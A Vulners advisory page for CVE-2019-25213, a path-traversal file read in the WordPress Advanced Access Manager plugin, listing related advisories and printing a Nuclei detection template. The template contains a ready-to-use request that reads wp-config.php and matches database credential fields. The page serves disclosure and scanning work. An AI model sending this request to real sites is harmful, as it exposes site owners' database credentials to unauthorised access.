Vulners
Lucene search
WordPress Advanced Access Manager - Path Traversal
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Ntemplatesbyxit | 7 May 202615:36 | – | githubexploit |
 | CVE-2019-25213 | 29 Nov 202518:33 | – | circl |
 | WordPress plugin Advanced Access Manager 路径遍历漏洞 | 16 Oct 202400:00 | – | cnnvd |
 | CVE-2019-25213 | 16 Oct 202406:43 | – | cve |
 | CVE-2019-25213 Advanced Access Manager <= 5.9.8.1 - Unauthenticated Arbitrary File Read | 16 Oct 202406:43 | – | cvelist |
 | EUVD-2019-19361 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-25213 | 16 Oct 202407:15 | – | nvd |
 | PT-2024-10744 · Wordfence +1 · Wordfence +1 | 15 Oct 202400:00 | – | ptsecurity |
 | CVE-2019-25213 | 5 Feb 202518:15 | – | redhatcve |
 | VulnCheck KEV: CVE-2019-25213 | 15 Oct 202400:00 | – | vulncheck_kev |
10
id: CVE-2019-25213
info:
name: WordPress Advanced Access Manager - Path Traversal
author: riteshs4hu
severity: critical
description: |
The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php
impact: |
Unauthenticated attackers can read sensitive files like wp-config.php, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest version of the plugin that addresses this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2019-25213
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-25213
epss-score: 0.43187
epss-percentile: 0.97569
cwe-id: CWE-264
metadata:
verified: true
max-request: 1
publicwww-query: "wp-content/plugins/advanced-access-manager"
tags: cve,cve2019,wordpress,wp-plugin,wp,advanced_access_manager,lfi,vkev
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'DB_NAME','DB_USER','DB_PASSWORD')"
condition: and
# digest: 490a00463044022056fe99ed526b6f10aca18c4068e044c773529df61e7589642c3dd152e2cc3ae30220762295c8e837e759ab257681162e74d5731830ac491ac8e9856ef9d0d0cfe86a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.5 - 9.8
EPSS0.43187
SSVC